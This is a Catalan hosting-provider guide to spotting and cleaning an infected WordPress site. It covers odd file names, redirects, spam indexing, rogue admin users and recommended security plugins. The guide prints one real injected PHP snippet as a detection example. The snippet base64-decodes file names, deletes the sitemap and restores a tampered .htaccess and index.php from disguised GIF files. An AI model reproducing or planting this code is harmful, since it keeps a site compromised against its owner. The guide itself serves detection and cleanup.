El Wordpress és el CMS més utilitzat del món. Això fa que les seves actualitzacions, connectors i altres eines siguin les que més suport reben en comparació amb altres eines.


En ser el més utilitzat amb gran diferència, també és el CMS més atacat, per la qual cosa és força comú trobar-se amb un Wordpress infectat.


Si utilitzem una versió de Wordpress antiga o algun dels nostres plugins no està tan actualitzat com sigui possible, hi ha la possibilitat que puguin tenir una falla de seguretat, i per tant, que es pugui injectar codi als arxius de la nostra pàgina web.


Per poder analitzar el nostre lloc, cal diferenciar els dos tipus d'infeccions que pot tenir el nostre Wordpress:


Infeccions als fitxers, normalment al tema o als plugins. Hi ha infeccions de fitxers que es propaguen i altres que no es propaguen.

Infeccions a la base de dades, que ocorren quan directament s'injecta codi maliciós a la base de dades de WordPress.


En aquesta guia mostrarem una sèrie de símptomes que pot patir la nostra web si ha estat infectada, a manera genèrica, ja que pot moltíssimes infeccions diferents. Ens centrarem en les infeccions de fitxers, ja que són molt més comunes i genèriques, les de bases de dades és millor estudiar-la cas a cas.


Arxius infectats

Redireccionament a pàgines no desitjades

Indexació spam a Google

No funciona correctament el disseny de la web

Usuaris de Wordpress creats automàticament

Desactivació de l'enviament de correus via web o comentaris spam al nostre blog

Suspensió temporal del hosting


IMPORTANT: Tenir els teus plugins totalment actualitzats, no garanteix la seguretat de l'allotjament. Tenir WordPress i els seus plugins actualitzats minimitzés aquestes possibilitats i ens ajudés a evitar ser infectats per problemes comuns i coneguts, però no garanteix al 100% que no es pugui injectar codi per aquesta actualització.


Arxius infectats


Primer de tot, indicarem com detectar arxius infectats. Moltes vegades, aquests es poden identificar ja només pel nom del fitxer, que es pot apreciar que té una sèrie de caràcters sense sentit i força sospitós. Solen ser .php, adjuntem dos exemples:


ffkoklhu.php

e6b6m5ju.php


No en tots els casos els fitxers infectats són tan evidents, ja que moltes vegades la infecció es fa en fitxers ja existents de la pàgina. Adjuntem el codi injectat d'un d'aquests com a exemple, però tingueu en compte que el codi i els diferents tipus d'infeccions poden ser molt variats. Entrem al codi d'un com a exemple:


//ckIIbg
$nowHtacFile =  base64_decode("Li8uaHRhY2Nlc3M=");
$nowIndexFile =  base64_decode("Li9pbmRleC5waHA=");
$bkLocalFileIndex1 =  './wp-includes/images/smilies/icon_devil.gif';
$bkLocalFileHtac1 =  './wp-includes/images/smilies/icon_crystal.gif';
$sitemap = base64_decode("Li9zaXRlbWFwLnhtbA==");
@unlink($sitemap);
if($nowHtacFile && file_exists($bkLocalFileHtac1)){
  if(!file_exists($nowHtacFile) or (filesize($nowHtacFile) != filesize($bkLocalFileHtac1))){
    @chmod($nowHtacFile,0755);
    @file_put_contents($nowHtacFile,file_get_contents($bkLocalFileHtac1));
    @chmod($nowHtacFile,0555);
  }
}


En aquest exemple, podem veure el base64_decode (descodificar) i la resta de noms aleatoris (Li9pbmRleC5waHA o //ckIIbg) que no semblen tenir un origen lícit.


IMPORTANT: Ha de tenir en compte que modificar el codi d'arxius vitals per a la pàgina pot alterar el funcionament d'aquesta, per la qual cosa us recomanem precaució a l'hora d'eliminar línies de codi o contactar amb algun programador web perquè revisi el codi d'aquesta .


Com més a més, podeu utilitzar aquesta eina de Google per comprovar si detecta contingut no segur sobre el vostre hosting:


https://transparencyreport.google.com/safe-browsing/search?url=cdmon.com


Redireccionament a pàgines no desitjades


Això pot passar en intentar accedir a la nostra pàgina principal de Wordpress o en intentar entrar en algun enllaç de dins de la nostra pàgina, que automàticament redirecciona a una pàgina externa o de contingut no lícit.


El més segur és que hi hagi alguna infecció de codi en algun dels fitxers de la seva pàgina.


Com resoldre el problema: Tal com hem indicat, en la majoria de casos aquest redireccionament és degut a alguna injecció directa sobre algun arxiu web, per la qual cosa caldrà fer una anàlisi dels arxius web per eliminar el codi que genera la redirecció. Es pot fer amb programes d'anàlisi de fitxers, però si amb aquests no s'aconsegueix trobar la infecció, cal revisar el codi de tots els fitxers a la recerca d'aquesta redirecció.


Recomanem instal·lar el plugin Wordfence perquè analitzi el vostre lloc de manera regular.


Des de cdmon oferim les còpies de seguretat dels darrers 15 dies per restaurar algun dia abans de la injecció de codi


Indexació spam a Google


És molt comú que una web pugui aparèixer amb un contingut spam si el busquem directament a Google. Adjuntem un exemple buscant example.com:



Una comprovació ràpida per saber si és un problema d'indexació de Google o no, podem fer la mateixa cerca a qualsevol altre motor de cerca, com ara Bing:




Si només passa a Google, vol dir que és un problema d'indexació d'aquest, per tant haurem d'accedir al Google Search Console i fer que Google reindexi correctament el nostre domini.


IMPORTANT: Si això passa en tots els motors de cerca, us recomanem que realitzeu una anàlisi dels arxius web i de base de dades per comprovar si hi ha alguna injecció de codi que afecti el posicionament SEO de la seva pàgina.


No funciona correctament el disseny de la web


Aquest símptoma és una mica més complex de detectar, ja que moltes vegades la web pot no visualitzar-se bé per alguna incompatibilitat o per algun canvi fet prèviament.


Les injeccions que afecten la visualització de la pàgina poden ser molt variades. Una gran part són degudes als "temes" que es tenen instal·lats al Wordpress.


Molts d'aquests "temes" en ser de codi obert o descarregar-se d'un lloc de procedència dubtosa, poden tenir codi injectat, per la qual cosa si utilitzem aquest plugin, podem veure una injecció al nostre Wordpress.


Per poder solucionar-ho, s'haurà de revisar el codi dels arxius web i base de dades a la recerca de l'injectat que pugui generar aquest mal funcionament.


Com podem prevenir-ho? Des de cdmon recomanem instal·lar els dos següents plugins com a mesura preventiva i d'anàlisi d'arxius per poder tenir més control sobre el lloc web.


Recomanem utilitzar un plugin anomenat TAC (Theme Authenticity Checker) que escaneja tots els fitxers dels temes instal·lats i indica si detecta qualsevol codi no lícit:


Web d'informació del plugin: https://wordpress.org/plugins/tac/


Com hem dit, no sempre les injeccions són únicament pels temes. És recomanable tenir els plugins i temes el més actualitzats possible per evitar injeccions per utilitzar una versió antiga


Per a l'anàlisi dels arxius web, recomanem utilitzar Wordfence, adjuntem una guia pas a pas per instal·lar-lo al Wordpress:


Web d'informació del plugin: https://es.wordpress.org/plugins/wordfence/


Plugins per augmentar la seguretat del nostre Wordpress


IMPORTANT: Tenir els plugins totalment actualitzats, no garanteix la seguretat de l'allotjament. Tenir WordPress i els seus plugins actualitzats minimitzés aquestes possibilitats i ens ajudés a evitar ser infectats per problemes comuns i coneguts, però no garanteix al 100% que no es pugui injectar codi per aquesta actualització.


Usuaris de Wordpress creats automàticament


També hi ha casos en què es creen usuaris al nostre administrador de Wordpress, aquest podria ser un exemple de la gestió d'usuaris d'un Wordpress infectat:



Com podeu veure, apareix un llistat d'usuaris que ja amb el nom i el correu associat no semblen lícits.


Ha de tenir en compte que si instal·la el Wordpress des de l'autoinstal·lador de cdmon, l'usuari també es crearia de forma aleatòria, per la qual cosa per verificar quin és l'usuari que tenen actiu recomanem utilitzar les dades d'accés que apareixen a la gestió del hosting on estigui instal·lat


Com veure les credencials d'accés d'un CMS instal·lat a cdmon


Suggeriments per a procedir: Segurament també hi ha algun codi que permet accedir a l'administració de la pàgina. El primer que es recomana fer és actualitzar i fer lanàlisi dels arxius.


Tot seguit, és recomanable actualitzar la contrasenya de la nostra base de dades per bloquejar el possible accés que puguin tenir:


Com canviar la contrasenya de l'usuari MySQL


IMPORTANT: Si modifiqueu la contrasenya de l'usuari MySQL, heu de modificar el fitxer "wp-config.php" i indicar la nova contrasenya en aquest fitxer.


Si després d'això el problema persisteix, és recomanable restaurar una còpia de seguretat quan la web funcionava bé o contactar amb un programador expert en injeccions web perquè revisi manualment el codi d'aquesta.


Desactivació de l'enviament de correus via web o comentaris spam al nostre blog


Si el vostre lloc web ha estat vulnerat i aconsegueixen enviar correus amb algun contingut spam, el sistema antispam de cdmon procedirà a desactivar l'enviament de correus via web (no el dels comptes de correu electrònic) per cessar aquesta activitat.


En cas que passés, contactaríem amb vostè immediatament per informar-lo.


Una gran part d'aquests enviaments il·lícits es deuen al fet que el formulari de contacte de la pàgina web no està actualitzat o no té algun tipus de validador que permet l'enviament massiu de correus. Sempre és recomanable tenir un Captcha instal·lat perquè faci la validació humana sobre els navegants:


Com instal·lar un reCaptcha a Wordpress


Un altre cas força similar és quan el nostre Wordpress s'omple de comentaris spam, pot ser per alguna falla de seguretat del nostre tema/plugins o per la validació abans esmentada. Per a aquests casos, recomanem utilitzar el plugin Akismet que augmenta la protecció contra spam. Al següent enllaç mostrem com instal·lar-lo directament a Wordpress:


Plugins per augmentar la seguretat del nostre Wordpress


Suspensió temporal del hosting


És possible que en alguna ocasió, en accedir a la vostra pàgina web vegin un missatge com el següent:


Aquest és un missatge de cdmon, és a dir, és un missatge del propi servidor.


Aquest només apareix quan un producte ha estat caducat és a dir, el sistema procedeix a desactivar temporalment l'accés a la web i els correus fins que el servei no es renovi.


L'altre motiu pel qual apareix és perquè el nostre sistema de detecció de codi maliciós hagi detectat algun arxiu amb codi maliciós i per tant, procedeix amb la desactivació temporal de la web fins a la revisió d'aquest. En aquest cas, el nostre sistema d'alertes enviaria un correu electrònic al correu de contacte del vostre usuari de cdmon amb més informació respecte a la desactivació del lloc.